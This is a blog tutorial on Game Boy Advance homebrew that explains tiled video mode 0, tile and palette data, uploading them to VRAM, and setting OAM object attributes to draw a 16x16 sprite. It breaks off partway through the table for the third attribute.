GBA By Example - Drawing and Moving Sprites2017-04-04T00:00:00+00:00http://kylehalladay.com/blog/tutorial/gba/2017/04/04/GBA-By-Example-2<p>(Note: This is Part 2 of my GBA by Example series. A list of my other GBA tutorials can be found <a href="http://kylehalladay.com/gba.html">here</a>)</p>
<p><a href="http://kylehalladay.com/blog/tutorial/2017/03/28/GBA-By-Example-1.html">Last week</a>, we were working in video mode 3, which is one of the “bitmap” video modes. These modes are named so because they use the GBA’s 96K of video memory (VRAM) to store a representation of the screen as an array of colour values. If you want to draw to pixel (0,0), you simply set the first element in the screen buffer array to the colour you want, and when the hardware draws, it reads the value at that location, and draws it to the screen.</p>
<p>While some games did use the bitmap modes to do some pretty amazing stuff (like <a href="http://www.ign.com/games/james-bond-007-nightfire/gba-497891">James Bond 007: NightFire</a> and <a href="http://www.ign.com/games/stuntman/gba-550094">Stuntman</a>), they were the exception, not the rule. Most GBA games that were released were purely 2D, and used what are called Tiled Video Modes, which provide hardware level optimizations for 2D drawing tasks.</p>
<p>So today I’m going to walk through the bare minimum needed to use one of these tiled video modes to draw (and move) a sprite across the screen, which might end up looking like this:</p>
<div align="center">
<img src="/images/post_images/2017-04-04/preview.gif" style="width:240px;height:160px" />
<font size="2">(Forgive the Programmer Art)</font><br /><br />
</div>
<p>Let’s get started!</p>
<h2 id="introducing-tiled-video-modes">Introducing Tiled Video Modes</h2>
<p>Tiled video modes are different from the bitmap modes because they don’t store large colour arrays in VRAM. Instead, VRAM is used to store collections of tiles (8x8 collections of colour values), and data about how to display these tiles. There are 3 different tiled video modes (mode 0 - mode 2), but I don’t know enough about the differences between them right now to make an informed choice about which one to use. Until that changes, I’m going to work in Mode 0 and kinda plug my ears and try not to think too hard about it:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define REG_DISPLAYCONTROL *((volatile uint16*)(0x04000000))
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//mode 0, no background enabled</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">){}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Since what we store in VRAM has changed since last week, it makes sense that there are a few new data structures that we’re going to have to understand in order to get anything useful into memory (and do anything interesting).</p>
<p>As mentioned, a <em>Tile</em> is an 8x8 collection of colour values (stored linearly, one row after the other), but these colour values are not the colours the sprite will actually use on screen. Instead, these values are used to look up the colour in a <em>Palette</em>, which is another data structure we’re going to have to wrangle today.</p>
<p>A <em>Palette</em> is a block of memory that contains colour values, plain and simple. An application gets 2 of these blocks of memory, one for backgrounds, and one for sprites. Each section is large enough to contain 256 colour values.</p>
<p>Tiles can take the form of 8bpp (bits per pixel), or 4bpp. 8bpp mode is pretty straightforward - we have 8 bits to play with, which means each value in our tile can be one of 256 possible values, which is exactly how many values we can store in a palette. In 4bpp mode, we get up to 16 possible values for each pixel, which means that we can only use a section of our palette memory for each sprite.</p>
<p>Because it sounds easier, and I promised that this article was the bare minimum we needed to draw a sprite, we’re going to use 8bpp today.</p>
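<p>To put numbers on the difference between the two formats, here’s a small sketch that works out how much memory one tile takes and how many palette entries a pixel can pick from. The function names are made up for this example:</p>

```c
#include <assert.h>
#include <stddef.h>

/* Bytes needed to store one 8x8 tile at the given bits per pixel (4 or 8). */
static size_t tile_bytes(unsigned bpp)
{
    assert(bpp == 4 || bpp == 8);
    return (8u * 8u * bpp) / 8u;
}

/* Number of distinct palette entries a single pixel can select. */
static unsigned colours_per_pixel(unsigned bpp)
{
    assert(bpp == 4 || bpp == 8);
    return 1u << bpp;
}
```

<p>An 8bpp tile comes out at 64 bytes with 256 possible colours per pixel, and a 4bpp tile at 32 bytes with 16.</p>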
<p>Finally, a Sprite is a rectangular collection of tiles, so when we format images to be used on the GBA, we need to break them up into 8x8 tiles, and a palette of colours that those tiles use, and then provide some data about which locations in Tile and Palette memory our sprite will use. It’s important to note that the GBA calls Sprites “Objects” (not the OOP kind). You can split hairs about this, but a GBA Object is a collection of tiles, arranged rectangularly, that move around the screen. Sounds like a Sprite to me.</p>
<p>I’m sure there are reasons why this isn’t true 100% of the time, but those reasons aren’t really important today.</p>
<p>So to wrap this section up:</p>
<ul>
<li>A Palette is an array of 256 colour values</li>
<li>A Tile’s colour values are actually indices into Palette memory</li>
<li>A Sprite is a (theoretical) rectangular collection of tiles.</li>
<li>The hardware equivalent of a Sprite is called an Object</li>
</ul>
<p><br />
Hopefully that’s all relatively clear! Let’s start putting all of this together</p>
<h2 id="working-with-sprite-data">Working With Sprite Data</h2>
<p>The first thing we need to do is to actually have some tile and colour data to use in our program.</p>
<p>For this section, I’m going to simply provide the data that we’re going to use. At the end of this post, I’ll link you to tools that you can use to make your own. To start with, let’s consider a really simple sprite, which consists of only a single tile, and 3 palette colours.</p>
<div align="center">
<img src="/images/post_images/2017-04-04/testsprite.png" />
<font size="2">(Grid lines added to help differentiate pixels, not included in sprite)</font><br /><br />
</div>
<p>Here’s what that sprite might look like in our program:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">testTiles</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span><span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x00000001</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x02020102</span><span class="p">,</span><span class="mh">0x02020202</span><span class="p">,</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">testPal</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span><span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x03E0001F</span><span class="p">,</span><span class="mh">0x00007C00</span><span class="p">,</span>
<span class="p">};</span></code></pre></figure>
<p>You can see that most of this is what we would expect: the testTiles data traverses each row in order from top to bottom, with each pixel’s palette index getting 8 bits (2 hex digits) of data, so each 32 bit value represents 4 pixels. The lowest bits represent the leftmost pixels, which makes sense logically, even if it makes things harder to read when you’re looking at hex values.</p>
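<p>If the byte ordering is hard to picture, this sketch pulls a single pixel’s palette index back out of an 8bpp tile stored the way testTiles is. tile_pixel_8bpp is a hypothetical helper, meant for poking at the data on a PC rather than for use on the GBA:</p>

```c
#include <assert.h>
#include <stdint.h>

/* Palette index of pixel (x, y) in one 8bpp tile stored as 16 32-bit words.
   Each row is two words; the lowest byte of a word is its leftmost pixel. */
static uint8_t tile_pixel_8bpp(const uint32_t tile[16], unsigned x, unsigned y)
{
    assert(x < 8 && y < 8);
    uint32_t word = tile[y * 2 + x / 4];        /* which word in the row */
    return (uint8_t)((word >> ((x % 4) * 8)) & 0xFFu); /* which byte in it */
}
```

<p>With the testTiles data, pixel (0,1) comes back as 1, and in row 6 the value 0x02020102 gives 2 at x = 0 and 1 at x = 1.</p>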
<p>The palette data is also as we would expect, containing the three colours used in our sprite, represented as 15 bit colours, with 2 colours per 32 bit value.</p>
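<p>Here’s a quick sketch of how those 15 bit colours are put together, and how two of them share one 32 bit palette word. Red sits in the lowest 5 bits, then green, then blue. rgb15 and unpack_palette_word are names picked for this example:</p>

```c
#include <assert.h>
#include <stdint.h>

/* Pack 5 bit red, green and blue channels (0-31 each) into a 15 bit colour. */
static uint16_t rgb15(unsigned r, unsigned g, unsigned b)
{
    assert(r < 32 && g < 32 && b < 32);
    return (uint16_t)(r | (g << 5) | (b << 10));
}

/* Split one 32 bit palette word into its two colours, low half first. */
static void unpack_palette_word(uint32_t word, uint16_t out[2])
{
    out[0] = (uint16_t)(word & 0xFFFFu);
    out[1] = (uint16_t)(word >> 16);
}
```

<p>Unpacking 0x03E0001F from testPal gives 0x001F (full red) followed by 0x03E0 (full green), and 0x00007C00 gives 0x7C00 (full blue) followed by an unused zero.</p>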
<p>The __attribute__((aligned(4))) is a GCC attribute that forces your data to be aligned on 4 byte boundaries. I took it straight from the <a href="http://www.coranac.com/tonc/text/regobj.htm">Tonc tutorial</a>, which says:</p>
<blockquote>
<p>As of devkitARM r19, there are new rules on struct alignments, which means that structs may not always be word aligned, and in the case of OBJ_ATTR structs (and others), means that [some] struct-copies … will not only be slow, they may actually break. For that reason, I will force word-alignment on many of my structs…</p>
</blockquote>
<p>Since I don’t know enough to argue with that right now, I’m taking it on faith that this is still a good idea.</p>
<p>Now that we know what our sprite data is going to look like, let’s use a slightly larger data set. This is mostly to make sure that what we do later is correctly ordering the tiles in our sprite. If we used the example data above, we wouldn’t be able to verify this because we only had 1 tile. Here’s the sprite and data that I’m going to be using for the rest of the article:</p>
<div align="center">
<img src="/images/post_images/2017-04-04/realsprite.png" /><br />
</div>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">spriteTiles</span><span class="p">[</span><span class="mi">64</span><span class="p">]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span><span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x01000000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x01010000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x01010100</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x01010101</span><span class="p">,</span>
<span class="mh">0x01000000</span><span class="p">,</span><span class="mh">0x01010101</span><span class="p">,</span><span class="mh">0x01010000</span><span class="p">,</span><span class="mh">0x01010101</span><span class="p">,</span><span class="mh">0x01010100</span><span class="p">,</span><span class="mh">0x01010101</span><span class="p">,</span><span class="mh">0x01010101</span><span class="p">,</span><span class="mh">0x01010101</span><span class="p">,</span>
<span class="mh">0x00000003</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000303</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00030303</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x03030303</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="mh">0x03030303</span><span class="p">,</span><span class="mh">0x00000003</span><span class="p">,</span><span class="mh">0x03030303</span><span class="p">,</span><span class="mh">0x00000303</span><span class="p">,</span><span class="mh">0x03030303</span><span class="p">,</span><span class="mh">0x00030303</span><span class="p">,</span><span class="mh">0x03030303</span><span class="p">,</span><span class="mh">0x03030303</span><span class="p">,</span>
<span class="mh">0x04040404</span><span class="p">,</span><span class="mh">0x04040404</span><span class="p">,</span><span class="mh">0x04040400</span><span class="p">,</span><span class="mh">0x04040404</span><span class="p">,</span><span class="mh">0x04040000</span><span class="p">,</span><span class="mh">0x04040404</span><span class="p">,</span><span class="mh">0x04000000</span><span class="p">,</span><span class="mh">0x04040404</span><span class="p">,</span>
<span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x04040404</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x04040400</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x04040000</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x04000000</span><span class="p">,</span>
<span class="mh">0x02020202</span><span class="p">,</span><span class="mh">0x02020202</span><span class="p">,</span><span class="mh">0x02020202</span><span class="p">,</span><span class="mh">0x00020202</span><span class="p">,</span><span class="mh">0x02020202</span><span class="p">,</span><span class="mh">0x00000202</span><span class="p">,</span><span class="mh">0x02020202</span><span class="p">,</span><span class="mh">0x00000002</span><span class="p">,</span>
<span class="mh">0x02020202</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00020202</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000202</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span><span class="mh">0x00000002</span><span class="p">,</span><span class="mh">0x00000000</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">spritePal</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span><span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x001E0000</span><span class="p">,</span><span class="mh">0x03E07FFF</span><span class="p">,</span><span class="mh">0x00007C1F</span><span class="p">,</span>
<span class="p">};</span></code></pre></figure>
<p>If you take a look at this larger sprite data, you’ll notice that it’s stored as a sequential array of 8x8 tiles, that is, the 3rd 32 bit value isn’t the first four pixels of the top right tile, it’s the first four pixels of the second row of the top left tile. This is to make things easier to get into VRAM, since we have to upload tiles, not whole images. Mercifully, there’s a command line tool that I’ll link later that will convert images to this format for us, so we don’t have to try to author images like this.</p>
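<p>To make the tile-by-tile ordering concrete, this sketch works out which 32 bit value in the array holds a given pixel of the sprite. It assumes the tiles themselves are stored left to right, top to bottom, and tiled_word_index is a made-up name:</p>

```c
#include <assert.h>
#include <stddef.h>

/* Index of the 32 bit word holding pixel (x, y) of an 8bpp sprite that is
   width_px pixels wide and stored one 8x8 tile after another.
   Assumption: tiles are ordered left to right, then top to bottom. */
static size_t tiled_word_index(unsigned x, unsigned y, unsigned width_px)
{
    assert(width_px % 8 == 0 && x < width_px);
    unsigned tiles_per_row = width_px / 8;
    unsigned tile = (y / 8) * tiles_per_row + (x / 8);
    /* 16 words per 8bpp tile, 2 words per row inside the tile */
    return (size_t)tile * 16 + (y % 8) * 2 + (x % 8) / 4;
}
```

<p>For the 16x16 sprite, pixel (0,1) lands in word 2 (the 3rd value, as described above), while pixel (8,0), the start of the top right tile, doesn’t show up until word 16.</p>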
<p>For readability’s sake, I’m going to put the above block of code into its own .c file, which I’m going to call sprite.c. I’m also going to create sprite.h, which looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#ifndef SPRITE_H
#define SPRITE_H
</span>
<span class="cp">#define spriteTilesLen 256 //size in bytes
</span><span class="k">extern</span> <span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">spriteTiles</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
<span class="cp">#define spritePalLen 12
</span><span class="k">extern</span> <span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">spritePal</span><span class="p">[</span><span class="mi">3</span><span class="p">];</span>
<span class="cp">#endif</span></code></pre></figure>
<p>I’m using 32 bit values to store everything, because when I tried to use 16 bit values, I ended up needing to pad my sizes in the header to the nearest multiple of 8 (so spritePalLen had to be 16), or else some data wouldn’t transfer. I’m not entirely sure why that is (or why making things ints fixed that), but I decided I’d rather not have to remember to do that, and chose to stick with 32 bit values even though they make the data slightly harder to read.</p>
<h2 id="getting-all-this-into-vram">Getting All This Into VRAM</h2>
<p>We have sprite data and palette data ready to go, but as we discussed earlier, we’re going to need to get this data into the proper parts of memory. Specifically, we’ll need to add the palette values to our larger 256 colour palette memory, upload tile data to tile memory, and then create a sprite that references those tiles.</p>
<p>Let’s start with the palette memory:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include &lt;string.h&gt; //for memcpy
#include "sprite.h"
</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">uint8</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">uint16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="cp">#define MEM_PALETTE ((uint16*)(0x05000200))
</span><span class="kt">void</span> <span class="nf">UploadPaletteMem</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">spritePal</span><span class="p">,</span> <span class="n">spritePalLen</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>This is pretty straightforward, the only thing to note is that in other articles, what I’m calling MEM_PALETTE here is usually called MEM_OBJ_PAL, or something similar. This is because palette memory on the GBA is divided into two sections, but we’re only using one of them today, so for simplicity’s sake, I’m just calling it MEM_PALETTE and pretending that’s all there is to it.</p>
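<p>One thing worth knowing: as far as I understand it, palette memory, VRAM and OAM don’t treat 8 bit writes the way normal RAM does, and a generic memcpy is free to copy a byte at a time. The memcpy call is what this post uses, but if a copy ever misbehaves, a plain loop that writes 16 bits at a time is a common alternative. Here’s a minimal sketch of one (copy16 is a hypothetical helper, not part of any library), written so it can be tried on a PC with an ordinary array standing in for palette memory:</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Copy `count` 16 bit values, one halfword write per element.
   `dst` is volatile so the compiler keeps each write as its own store. */
static void copy16(volatile uint16_t *dst, const uint16_t *src, size_t count)
{
    assert(dst && src);
    for (size_t i = 0; i < count; ++i) {
        dst[i] = src[i];
    }
}
```

<p>On the GBA the destination would be MEM_PALETTE and the count would be the number of colours rather than the number of bytes.</p>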
<p>Next we need to upload our tile memory, this is a bit less straightforward:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="n">uint32</span> <span class="n">Tile</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">Tile</span> <span class="n">TileBlock</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="cp">#define MEM_VRAM ((volatile uint32*)0x06000000)
#define MEM_TILE ( (TileBlock*)MEM_VRAM )
</span>
<span class="kt">void</span> <span class="nf">UploadTileMem</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span> <span class="n">spriteTiles</span><span class="p">,</span> <span class="n">spriteTilesLen</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>To understand what’s going on here, we need to know a bit more about how tiles are stored in VRAM. In tiled video modes, VRAM is used to store tile data, and that data is arranged in 16 KB blocks, called “tile blocks” or (more confusingly) “charblocks.” Since the GBA has 96 KB of VRAM, this gives us 6 tile blocks total.</p>
<p>The first four of these tile blocks are reserved for backgrounds (which we aren’t delving into today), and the remaining two are for sprite tiles. This means that when we want to put a sprite tile into memory, the first possible memory slot for us is at MEM_VRAM + 64 KB (that is, + 65536 bytes). This gives us a memory address of 0x06010000, but it’s much easier to get at individual tile addresses using the typedefs / array notation you see here.</p>
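<p>If you’d like to check the arithmetic that the array notation is doing for us, here’s a small sketch that computes the address of an 8bpp tile by hand. The constant and function names are made up for this example:</p>

```c
#include <assert.h>
#include <stdint.h>

#define VRAM_BASE        0x06000000u
#define TILE_BLOCK_BYTES 0x4000u   /* 16 KB per tile block */
#define TILE_8BPP_BYTES  64u       /* one 8x8 tile at 8 bits per pixel */

/* Address of 8bpp tile `index` inside tile block `block` (0-5),
   i.e. the address that &MEM_TILE[block][index] refers to. */
static uint32_t tile_address_8bpp(unsigned block, unsigned index)
{
    assert(block < 6 && index < 256);
    return VRAM_BASE + block * TILE_BLOCK_BYTES + index * TILE_8BPP_BYTES;
}
```

<p>Block 4, tile 0 comes out at 0x06010000, and the [4][1] slot used above sits 64 bytes later at 0x06010040.</p>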
<p>I’m putting my sprite into [4][1] instead of [4][0] because writing into [4][0] ended up putting some weird artifacts on the top left corner of my screen. I’m not sure why that is yet, and I haven’t found another example of using 8bpp sprites online to see what they’re doing, so I’m going to leave it for now (if you know what’s going on, shoot me a message <a href="https://twitter.com/khalladay">on Twitter</a>).</p>
<p>The last thing we need to get into memory is a description of our sprite (since we need to know how to combine all these tiles we just put into VRAM). To do that, we’re going to define an Object.</p>
<h2 id="gba-objects-arent-objects">GBA Objects Aren’t “Objects”</h2>
<p>As mentioned earlier, a GBA Object is NOT an OOP style Object. Instead, Objects are simply collections of tiles which can be transformed / drawn without needing to clear where they were. If you remember from <a href="http://kylehalladay.com/blog/tutorial/2017/03/28/GBA-By-Example-1.html">last week</a>, we had to do all our own clearing. Objects relieve us of that duty.</p>
<p>Unfortunately, creating an Object is a bit of an arcane exercise, so bear with me here. The first thing we need to do is to define the Object data structure, and where object memory lives:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="k">struct</span> <span class="n">ObjectAttributes</span> <span class="p">{</span>
<span class="n">uint16</span> <span class="n">attr0</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">attr1</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">attr2</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">pad</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">packed</span><span class="p">,</span> <span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span> <span class="n">ObjectAttributes</span><span class="p">;</span>
<span class="cp">#define MEM_OAM ((volatile ObjectAttributes *)0x07000000)</span></code></pre></figure>
<p>As you may have guessed from above, you don’t technically store objects in memory (although you’re free to call your struct whatever you want), instead we store what’s referred to as “Object Attributes.” These structs are stored in “Object Attribute Memory”, or OAM.</p>
<p>There’s a lot of information packed into the three uint16 variables in the ObjectAttributes struct, and it’s easy to get lost. In the interest of being the “bare minimum” you need to move a sprite around the screen, I’m only going to talk about the bits that we’re going to use today. If you want a more granular look at things, <a href="http://www.coranac.com/tonc/text/regobj.htm">Tonc</a> does an excellent job at explaining what every bit does.</p>
<p>It’s easiest to describe how these variables work in a table, so here’s attr0:</p>
<div align="center">
<table style="border:1px solid black; width=600px; padding:2px;">
<colgroup>
<col width="200px" />
<col width="400px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854;">
<tr class="header">
<th>Attr 0</th>
<th> 0x FEDC BA98 7654 3210</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>FE</td>
<td style="border:1px solid black;">Shape of Sprite: 00 = Square, 01 = Wide, 10 = Tall</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">D</td>
<td>Colour Mode: 0 = 4bpp, 1 = 8bpp</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">C</td>
<td>Not used today</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">BA</td>
<td>Not used today</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">98</td>
<td>Not used today</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">7654 3210</td>
<td>Y Coordinate</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>Our sprite is an 8bpp, square sprite. Using this table, if we wanted to define a sprite like that, and place it at a Y coordinate of 50, we could do so like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2032</span><span class="p">;</span></code></pre></figure>
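<p>Rather than working out the hex by hand, the same value can be assembled from the fields in the table. This is just a sketch that covers the three fields we’re using today; make_attr0 and SHAPE_SQUARE are hypothetical names, not something from a GBA library:</p>

```c
#include <assert.h>
#include <stdint.h>

enum { SHAPE_SQUARE = 0 };  /* hypothetical name for shape bits 00 */

/* Build attr0 from the Y coordinate (bits 0-7), the colour mode
   (bit D: 0 = 4bpp, 1 = 8bpp) and the shape (bits FE). */
static uint16_t make_attr0(unsigned y, unsigned is_8bpp, unsigned shape)
{
    assert(y < 256 && is_8bpp < 2 && shape < 3);
    return (uint16_t)((shape << 14) | (is_8bpp << 13) | y);
}
```

<p>Calling make_attr0(50, 1, SHAPE_SQUARE) gives 0x2032, the same value written above.</p>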
<p>Here’s what we need in Attr1:</p>
<div align="center">
<table style="border:1px solid black; width=600px;">
<colgroup>
<col width="200px" />
<col width="400px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854">
<tr class="header">
<th>Attr 1</th>
<th> 0x FEDC BA98 7654 3210</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>FE</td>
<td style="border:1px solid black;">Sprite Size (discussed below)</td>
</tr>
<tr style="border:1px solid black;">
<td style="border:1px solid black;">DCBA9</td>
<td>Not Used Today</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td style="border:1px solid black;">8 7654 3210</td>
<td>X coordinate
</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>Sprite size is weird on the GBA. A sprite can be a maximum of 64x64, but doesn’t necessarily have to be square, meaning that the size of your sprite depends both on the value in bits FE of Attribute 1, and on the shape you defined in Attribute 0. They work together like this (sizes are width x height):</p>
<div align="center">
<table style="border:1px solid black; width=480px;">
<colgroup>
<col width="80px" />
<col width="100px" />
<col width="100px" />
<col width="100px" />
<col width="100px" />
</colgroup>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td></td>
<td style="border:1px solid black;">Size 00 </td>
<td style="border:1px solid black;">Size 01 </td>
<td style="border:1px solid black;">Size 10 </td>
<td style="border:1px solid black;">Size 11 </td>
</tr>
<tr style="border:1px solid black;">
<td style="background-color:#DDDDDD;">Shape 00</td>
<td style="border:1px solid black;">8x8 </td>
<td style="border:1px solid black;">16x16 </td>
<td style="border:1px solid black;">32x32 </td>
<td style="border:1px solid black;">64x64 </td>
</tr>
<tr style="border:1px solid black;">
<td style="background-color:#DDDDDD;">Shape 01</td>
<td style="border:1px solid black;">16x8 </td>
<td style="border:1px solid black;">32x8 </td>
<td style="border:1px solid black;">32x16 </td>
<td style="border:1px solid black;">64x32 </td>
</tr>
<tr style="border:1px solid black;">
<td style="background-color:#DDDDDD;">Shape 10</td>
<td style="border:1px solid black;">8x16 </td>
<td style="border:1px solid black;">8x32 </td>
<td style="border:1px solid black;">16x32 </td>
<td style="border:1px solid black;">32x64 </td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>It certainly has some logical consistency to it, but I still find it really cumbersome to figure out what I need. In any case, given that we defined a square sprite in attribute 0, if we wanted to define a 16x16 sprite (and we do), at an x coordinate of 100, it would look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2032</span><span class="p">;</span> <span class="c1">// 8bpp tiles, SQUARE shape</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0x4064</span><span class="p">;</span></code></pre></figure>
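<p>Since I find the shape / size table cumbersome, here’s a sketch that turns it into a lookup, along with a helper that builds attr1 from the two fields we care about. All of the names here are made up for illustration, and the helper deliberately sticks to X values that fit in 8 bits:</p>

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    uint8_t width;
    uint8_t height;
} SpriteDims;

/* Rows are shape bits 00, 01, 10; columns are size bits 00 to 11. */
static const SpriteDims kSpriteDims[3][4] = {
    { { 8,  8}, {16, 16}, {32, 32}, {64, 64} },
    { {16,  8}, {32,  8}, {32, 16}, {64, 32} },
    { { 8, 16}, { 8, 32}, {16, 32}, {32, 64} },
};

/* Pixel dimensions for a given shape (attr0) and size (attr1) pair. */
static SpriteDims sprite_dims(unsigned shape, unsigned size)
{
    assert(shape < 3 && size < 4);
    return kSpriteDims[shape][size];
}

/* Build attr1 from the X coordinate and the size bits (bits FE).
   Conservative: only accepts X values that fit in the low 8 bits. */
static uint16_t make_attr1(unsigned x, unsigned size)
{
    assert(x < 256 && size < 4);
    return (uint16_t)((size << 14) | x);
}
```

<p>sprite_dims(0, 1) reports 16x16 for our square sprite, and make_attr1(100, 1) gives the 0x4064 used above.</p>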
<p>The last attribute we need to define is maybe the most important, since it tells the hardware where to look for the tiles in VRAM:</p>
<div align="center">
<table style="border:1px solid black; width=600px;">
<colgroup>
<col width="200px" />
<col width="400px" />
</colgroup>
<thead style="border:1px solid black; background-color:#FF8854">
<tr class="header">
<th>Attr 2</th>
<th> 0x FEDC BA98 7654 3210</th>
</tr>
</thead>
<tbody>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>FEDC</td>
<td style="border:1px solid black;">Not Used Today</td>
</tr>
<tr style="border:1px solid black;">
<td>BA</td>
